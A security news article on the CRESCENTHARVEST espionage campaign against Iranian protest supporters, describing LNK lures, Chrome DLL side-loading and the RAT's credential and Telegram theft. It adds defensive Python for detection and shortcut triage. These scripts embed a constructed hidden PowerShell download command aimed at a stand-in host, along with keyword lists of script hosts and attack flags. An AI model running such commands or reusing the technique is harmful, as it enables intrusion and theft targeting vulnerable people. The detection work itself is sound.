CRESCENTHARVEST RAT Targets Iranian Protest Supporters
New espionage campaign uses protest-themed lures and Chrome DLL side-loading to deploy RAT malware against Iranian diaspora, activists, and journalists.
Security researchers have uncovered a fresh espionage campaign targeting Iranian protest supporters through malicious LNK files disguised as protest-related media. The operation, tracked as CRESCENTHARVEST, deploys a remote access trojan capable of browser credential theft, Telegram session hijacking, and keystroke logging.
The campaign appears designed to target journalists, activists, researchers, and diaspora communities seeking information about ongoing protests in Iran, according to analysis published by The Hacker News.
Not the First Time
This marks the second major campaign targeting Iranian protest documenters in recent months. We covered the RedKitten/SloppyMIO operation in late January, which used fabricated casualty lists as lures. CRESCENTHARVEST takes a different approach but shares the same strategic objective: compromising individuals who document or support protest activities.
Both campaigns exploit the natural urgency around protest documentation. People involved in human rights work will open files that appear to contain evidence of abuses—exactly what these threat actors count on.
Attack Chain
The infection begins with password-protected archives containing malicious .LNK files disguised with double extensions like "protest_video.mp4.lnk" or "victim_photos.jpg.lnk". The archives bundle legitimate protest media alongside the weaponized shortcuts, making the package appear authentic.
When a victim clicks the LNK file, PowerShell code executes and retrieves additional archives from attacker-controlled infrastructure. The final payload arrives via DLL side-loading—the attackers abuse a legitimate Google-signed Chrome cleanup utility (software_reporter_tool.exe) to load their malicious DLLs.
Side-loading is not a supply chain compromise in itself: the Chrome binary is unmodified and still carries Google's valid signature. It exploits the same blind spot, though. Legitimate signed binaries provide cover for malicious payloads, complicating both automated detection and manual analysis, because allow-lists and reputation checks judge the signed executable rather than the DLL it loads. Two checks help here: the genuine copy of software_reporter_tool.exe lives under Chrome's SwReporter directory in the user's local application data, so a copy anywhere else has been planted, and Google retired the Chrome Cleanup Tool in 2023, so on a current Chrome installation the binary should not be running at all.
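Translating the chain above into telemetry checks, here is an added example (not code from the researchers or from the article) in Python that runs three rules over constructed Sysmon-style events: a script host spawned by Explorer with download or window-hiding flags, software_reporter_tool.exe loading version.dll or urtcbased140d_d.dll from outside the Windows system directories, and a DNS query for servicelog-information[.]com. The file paths, user name and PowerShell command line are made up; only the DLL and domain names come from the report.

```python
"""Detection logic for the CRESCENTHARVEST chain over Sysmon-style events.

Added example, not code from the original report. The events below are
constructed to mirror the chain: Explorer launching PowerShell from a
shortcut, software_reporter_tool.exe loading a DLL from its own directory,
and a DNS query for the reported C2 domain. Usernames, paths and the
PowerShell command line are made up; only the DLL and domain names come
from the report.
"""
import ntpath

SIDELOAD_HOSTS = {"software_reporter_tool.exe"}
SIDELOAD_DLLS = {"version.dll", "urtcbased140d_d.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
PS_MARKERS = ("-w hidden", "-windowstyle hidden", "-enc", "bypass",
              "downloadstring", "iwr ", "http")
# IOCs are kept defanged in the list and refanged when loaded.
C2_DOMAINS = {d.replace("[.]", ".") for d in {"servicelog-information[.]com"}}


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def rule_lnk_spawned_script_host(ev: dict):
    """Event 1: Explorer (the LNK handler) starts a script host with download/hide flags."""
    if ev["EventID"] != 1 or base(ev["Image"]) not in SCRIPT_HOSTS:
        return None
    if base(ev["ParentImage"]) != "explorer.exe":
        return None
    cmd = ev["CommandLine"].lower()
    if any(m in cmd for m in PS_MARKERS):
        return f"{base(ev['Image'])} launched by Explorer with: {ev['CommandLine']}"
    return None


def rule_dll_sideload(ev: dict):
    """Event 7: the Chrome reporter binary loads a named DLL from outside the system dirs."""
    if ev["EventID"] != 7 or base(ev["Image"]) not in SIDELOAD_HOSTS:
        return None
    dll = ev["ImageLoaded"]
    if base(dll) not in SIDELOAD_DLLS or dll.lower().startswith(SYSTEM_DIRS):
        return None  # the genuine version.dll lives in System32/SysWOW64
    return (f"{base(ev['Image'])} side-loaded {base(dll)} from {ntpath.dirname(dll)} "
            f"(signature: {ev.get('Signature') or 'none'})")


def rule_c2_dns(ev: dict):
    """Event 22: any process resolving the reported C2 domain or a subdomain of it."""
    if ev["EventID"] != 22:
        return None
    name = ev["QueryName"].lower().rstrip(".")
    if name in C2_DOMAINS or any(name.endswith("." + d) for d in C2_DOMAINS):
        return f"{base(ev['Image'])} resolved C2 domain {name}"
    return None


RULES = (rule_lnk_spawned_script_host, rule_dll_sideload, rule_c2_dns)


def run(events: list) -> list:
    """Return (EventID, rule name, message) for every event a rule fires on."""
    hits = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((ev["EventID"], rule.__name__, msg))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, in the order the chain would produce them
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -ep bypass -c "iwr https://cdn.example.invalid/m.zip -OutFile $env:TEMP\m.zip"'},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"EventID": 7, "Image": r"C:\Users\sara\AppData\Local\Temp\update\software_reporter_tool.exe",
     "ImageLoaded": r"C:\Users\sara\AppData\Local\Temp\update\version.dll", "Signature": ""},
    {"EventID": 7, "Image": r"C:\Users\sara\AppData\Local\Google\Chrome\User Data\SwReporter\1.2.3.4\software_reporter_tool.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signature": "Microsoft Windows"},
    {"EventID": 22, "Image": r"C:\Users\sara\AppData\Local\Temp\update\software_reporter_tool.exe",
     "QueryName": "servicelog-information.com"},
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "www.example.com"},
]

if __name__ == "__main__":
    for event_id, rule_name, msg in run(SAMPLE_EVENTS):
        print(f"[{event_id}] {rule_name}: {msg}")
```

The side-load rule keys on the load path rather than on the DLL's signature: the real version.dll is a Microsoft-signed file in System32, so the same name loaded from the reporter binary's own directory is the side-load whatever the DLL claims about itself. Running the block prints one line per hit; the benign events (PowerShell started from cmd.exe, the system version.dll, an unrelated lookup) produce none.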
Payload Capabilities
The CRESCENTHARVEST RAT operates through two primary DLL components:
urtcbased140d_d.dll extracts and decrypts Chrome's app-bound encryption keys, enabling theft of browser-stored credentials. The component shares code with ChromElevator, a known credential-harvesting tool.
version.dll serves as the main implant, collecting:
- Installed antivirus products
- User account information
- Browser history and saved credentials
- Telegram session data
- Keystroke logs
The RAT supports an extensive command set including directory enumeration, file uploads, PowerShell execution, cookie harvesting, and shell access. Telegram session theft is particularly concerning—access to messaging history and contacts provides intelligence on the victim's network and activities.
C2 Infrastructure
Command-and-control communications route through servicelog-information[.]com. The domain appears purpose-built for this campaign, with no observed connections to previously attributed infrastructure.
The campaign's timing aligns with nationwide Iranian protests that began in late 2025 and continued into 2026. Researchers observed activity picking up after January 9, 2026, following a fresh wave of demonstrations.
Attribution
No firm attribution has been established, though the campaign reflects tradecraft consistent with Iranian state-sponsored groups like Charming Kitten and Tortoiseshell. The targeting profile—diaspora communities, journalists, activists—matches known priorities of Iranian intelligence services.
The use of Telegram for data collection also fits regional patterns. Despite government blocking attempts, Telegram remains widely used by Iranian citizens and opposition groups. Compromising Telegram sessions provides direct visibility into activist communications and organizing efforts.
Operational Security Concerns
For individuals working on Iranian human rights issues, this campaign underscores operational security fundamentals:
- Treat protest documentation with suspicion - files claiming to contain casualty information or protest evidence are prime lure material
- Verify file extensions carefully - double extensions like .mp4.lnk indicate weaponized shortcuts. Note that Explorer hides the .lnk suffix even when "hide extensions for known file types" is turned off, so protest_video.mp4.lnk is displayed as protest_video.mp4; the remaining tells are the arrow overlay on the icon, "Shortcut" in the Type column, and the real target shown in the file's Properties
- Use sandboxed environments - open untrusted files in isolated systems
- Monitor Telegram sessions - review active sessions and terminate unrecognized devices
- Separate work from personal systems - compartmentalization limits exposure when compromise occurs
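A shortcut's real target and arguments can be read without opening it. The following is an added example, not code from the report or the researchers, that parses the MS-SHLLINK header and string fields of a .lnk file and flags the traits a lure shortcut carries: a media-looking name with a hidden .lnk suffix, a script host as the target, download or window-hiding arguments, and a ShowCommand that starts the window minimized. The shortcut it examines is built in memory; its PowerShell command line and download URL are invented.

```python
"""Offline triage of a Windows shortcut (.lnk) without launching it.

Added example, not from the original report. It reads the MS-SHLLINK header
and StringData fields and flags the traits a weaponized shortcut shows.
The sample shortcut is assembled in memory; its PowerShell command line and
URL are made up.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))  # on-disk StringData order
SW_SHOWMINNOACTIVE = 7
MEDIA_EXTS = (".mp4", ".mov", ".jpg", ".jpeg", ".png", ".pdf", ".doc", ".docx")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe")
ARG_MARKERS = ("-enc", "-e ", "hidden", "bypass", "iex", "downloadstring", "iwr", "http")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shell link."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # skip LinkTargetIDList (uint16 size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (uint32 size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, name in STRING_FIELDS:              # each: CountCharacters then the string
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


def triage(filename: str, data: bytes) -> list:
    """Heuristics for a lure shortcut; an empty list means nothing stood out."""
    info = parse_lnk(data)
    findings = []
    stem = filename.lower().removesuffix(".lnk")
    if filename.lower().endswith(".lnk") and stem.endswith(MEDIA_EXTS):
        findings.append("double extension: Explorer will show this as a media file")
    target = info.get("relative_path", "").lower().rsplit("\\", 1)[-1]
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {target}")
    args = info.get("arguments", "").lower()
    findings += [f"suspicious argument: {m}" for m in ARG_MARKERS if m in args]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7: window starts minimized, so no console is seen")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Assemble a minimal shell link (no IDList/LinkInfo) for offline testing."""
    flags = 0x08 | 0x20 | IS_UNICODE             # HasRelativePath | HasArguments | IsUnicode
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed lure: a shortcut named like a video that really runs PowerShell.
LURE_NAME = "protest_video.mp4.lnk"
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-nop -w hidden -ep bypass -c "iwr https://cdn.example.invalid/m.zip -OutFile $env:TEMP\m.zip"',
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\Documents\notes.txt", "")

if __name__ == "__main__":
    for name, blob in ((LURE_NAME, LURE_LNK), ("notes.lnk", BENIGN_LNK)):
        print(name, triage(name, blob) or "clean")
```

Run it against a real sample by reading the .lnk bytes from a file on an isolated machine; parse_lnk never executes anything, it only walks the structure. The relative-path field is enough for most lures, but a shortcut can also carry its target only in the IDList, which this parser skips, so an empty relative_path on a suspicious file is itself a reason to look closer.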
For organizations tracking similar threats, the INFY/Tornado campaign analysis provides additional context on Iranian threat actor evolution.
Why This Matters
CRESCENTHARVEST demonstrates continued investment in targeting civil society. The technical sophistication isn't exceptional—DLL side-loading and credential theft are well-established techniques. But the social engineering shows careful attention to what will compel targets to open files.
Anyone documenting human rights situations should assume they're a target. The same urgency that drives activists to act on new information is precisely what these campaigns exploit. Verification before opening, isolation when possible, and paranoia as default posture remain the best defenses against operations designed to turn empathy into vulnerability.
Related Articles
Iran's Infy APT Drops Tornado v51 After Internet Blackout
SafeBreach tracks Infy APT deploying Tornado v51 malware with blockchain-based C2 after Iran's internet blackout, confirming state sponsorship ties.
Feb 8, 2026

RedKitten Malware Targets Iranian Protest Documenters
French researchers uncover SloppyMIO, an AI-assisted malware campaign using fabricated victim lists to target individuals documenting human rights abuses during Iranian protests.
Jan 31, 2026

Iran-Linked Hackers Target Middle East Officials via WhatsApp
APT42 campaign compromises government ministers, activists, and journalists through fake login pages and real-time surveillance capabilities.
Jan 18, 2026

Iranian Infy APT Resurfaces After Five Years with Telegram-Based C2
SafeBreach uncovers new Prince of Persia campaign using updated Foudre and Tonnerre malware, now leveraging Telegram for command and control.
Dec 23, 2025